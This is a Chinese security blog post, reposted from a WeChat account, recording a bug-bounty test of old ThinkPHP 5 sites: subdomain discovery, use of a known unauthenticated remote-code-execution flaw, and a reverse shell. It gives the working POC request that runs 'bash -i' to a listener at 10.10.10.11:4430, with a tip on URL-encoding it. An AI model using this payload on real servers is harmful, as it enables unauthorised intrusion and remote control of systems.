Thinkphp5挖洞记录

admin
admin
admin
138876
文章
114
评论
2022年3月9日21:59:27评论132 views字数 990阅读3分18秒阅读模式
闲来无事,盒子上申请了下项目,发现二个 thinkPHP 的站,版本还都挺老,记录一下 反弹 shell 的过程。
盒子项目申请一过,准时准点往前冲,发现测试范围只有一个子域名,稍微过了一下, 前排明显的漏洞应该大佬们都提完了,就想着大佬们往前冲,我就另辟蹊径看看能不能通过 其他子域进到测试范围。惯例先干子域名,用 oneforall 跑了下子域名,大概几十个,然后用 goby 过了一下子域名的资产

Thinkphp5挖洞记录

发现有二个站用的是老版本的 thinkPHP
心里的想法就开始躁动不安了,那可得好好干一下,tp5 的洞第一次挖,也顺带记录学 习一下,往后备用。
首先,我是先去找了一下有没有Nday可以利用的。谁叫thinkphp有那么多的漏洞呢!不用太可惜了!于是乎我找到了。
thinkphp5.0.x、5.1.x、5.2.x 这几个版本,都无需登入可以进行远程代码执行
参考的文章:
https://www.freebuf.com/column/230787.html 
文章中很好的复现了该漏洞了,也提供了POC我们可以直接进行测试了。
但我还是去找了一个工具去做检测。
工具下载地址:
https://github.com/sukabuliet/ThinkphpRCE
接下来就是来一波复盘啦!
一、 漏洞验证
登录的页面

Thinkphp5挖洞记录

url添加点字符再重新确认一遍 版本等信息

Thinkphp5挖洞记录

      嘿嘿彻底确定了之后,上工具。

Thinkphp5挖洞记录

      这就舒服了。那么我们再进行利用!

Thinkphp5挖洞记录

哈哈 成功利用了!~~~(*^_^*) 而且还知道了是linux的系统
那么我又利用上了公众号上篇文章的内网转发了。
首先开启我们的工具以及nc进行监听

Thinkphp5挖洞记录

准备就绪,那么就继续上我们的反弹shell
Poc:_method=__construct&method=get&filter[]=system&get[]=bash -i >&/dev/tcp/10.10.10.11/4430 >&1

     反弹 shell 这里有个不大不小的坑,因为连接符的关系没能完整的把代码传过去,这里就利用url编码进行了简单的绕过这个问题,所以 没反弹成功的Pocbash-i>&/dev/tcp/10.10.10.11/4430>&1(需要url编码)

Thinkphp5挖洞记录

      就这样完成了一次测试:

信息收集(子域名)->goby(批量子域名指纹收集)->Nday利用->内网转发反弹shell

本文始发于微信公众号(NOVASEC):Thinkphp5挖洞记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月9日21:59:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Thinkphp5挖洞记录https://cn-sec.com/archives/495403.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息